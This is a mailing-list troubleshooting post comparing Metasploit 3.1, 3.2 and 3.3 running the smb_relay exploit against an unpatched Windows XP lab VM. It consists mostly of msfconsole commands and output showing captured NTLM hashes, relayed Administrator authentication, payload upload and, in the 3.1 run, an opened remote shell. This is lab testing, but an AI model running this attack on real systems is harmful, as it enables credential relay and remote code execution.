smbrelay: framework 3.1 more reliable than 3.2 and 3.3?

[m.iodice at gmail.com (Mirko Iodice)]

Recently I tested smbrelay attack from 3 different versions of
metasploit against an unpatched (ms08-068) Windows XP Pro SP2 (VMWare
test machine).
I've got the same strange results running the attack from two
different Linux boxes: one is my Ubuntu Intrepid Ibex and another one
is a Backtrack 3 Virtual Machine.

Below you can find the results, only metasploit framework 3.1 always
works... someone can explain what's happening?

Thank you.

---
msf v3.3-dev rev. 5990 vs unpatched (ms08-068) XP Pro SP2

msf > use windows/smb/smb_relay
msf exploit(smb_relay) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(smb_relay) > exploit
[*] Exploit running as background job.
msf exploit(smb_relay) >
[*] Started bind handler
[*] Server started.
[*] Received 192.168.109.128:1129 TESTDOMAIN\Administrator
LMHASH:7a82adf17f0d0d797eea14a99f17a00883c8db54aebfece8
NTHASH:8a2ffa5bd93d8a445f7b403d905c78b36909948a81e4b2ba OS:Windows
2002 Service Pack 2 2600 LM:Windows 2002 5.1
[*] Authenticating to 192.168.109.128 as TESTDOMAIN\Administrator...
[*] AUTHENTICATED as TESTDOMAIN\Administrator...
[*] Connecting to the ADMIN$ share...
[*] Regenerating the payload...
[*] Started bind handler
[*] Uploading payload...
[*] Created \QUmlMAKy.exe...
[*] Connecting to the Service Control Manager...

get stuck here and nothing happens...

---
msf v3.2-release vs unpatched (ms08-068) XP Pro SP2

msf > use windows/smb/smb_relay
msf exploit(smb_relay) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(smb_relay) > exploit
[*] Exploit running as background job.
msf exploit(smb_relay) >
[*] Started bind handler
[*] Server started.
[*] Received 192.168.109.128:1145 TESTDOMAIN\Administrator
LMHASH:b1af5fb25aedf0a866e0c894fc7245c120a901b7811ecdc9
NTHASH:c72f5d912ab3429c187391217d7c17888fe0dbd2dc84a228 OS:Windows
2002 Service Pack 2 2600 LM:Windows 2002 5.1
[*] Authenticating to 192.168.109.128 as TESTDOMAIN\Administrator...
[*] AUTHENTICATED as TESTDOMAIN\Administrator...
[*] Connecting to the ADMIN$ share...
[*] Regenerating the payload...
[*] Started bind handler
[*] Uploading payload...
[*] Created \fcRkDlSK.exe...
[*] Connecting to the Service Control Manager...

get stuck here and nothing happens...

---
msf v3.1-release vs unpatched (ms08-068) XP Pro SP2

msf > use windows/smb/smb_relay
msf exploit(smb_relay) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(smb_relay) > exploit
[*] Server started.
msf exploit(smb_relay) >
[*] Received 192.168.109.128:1181 TESTDOMAIN\Administrator
LMHASH:b28812aaf57e770414a8f6d52eae10f907b2c4479b63f0b5
NTHASH:20b10932651da64ea42a2f0a6aaea0e59f7aba4d9bda6fa3 OS:Windows
2002 Service Pack 2 2600 LM:Windows 2002 5.1
[*] Authenticating to 192.168.109.128 as TESTDOMAIN\Administrator...
[*] AUTHENTICATED as TESTDOMAIN\Administrator...
[*] Connecting to the ADMIN$ share...
[*] Regenerating the payload...
[*] Started bind handler
[*] Uploading payload...
[*] Created \DIfcbGwH.exe...
[*] Connecting to the Service Control Manager...
[*] Obtaining a service manager handle...
[*] Creating a new service...
[*] Closing service handle...
[*] Opening service...

[*] You *MUST* manually remove the service: 192.168.109.128 (DyHcMKdL
- "MrXgHSxGCUuHbsLgpIFNQmAd")
[*] You *MUST* manually delete the service file: 192.168.109.128
%SYSTEMROOT%\DIfcbGwH.exe

[*] Starting the service...
[*] Sending stage (474 bytes)
[*] Command shell session 1 opened (192.168.109.1:44105 -> 192.168.109.128:4444)

it works!

---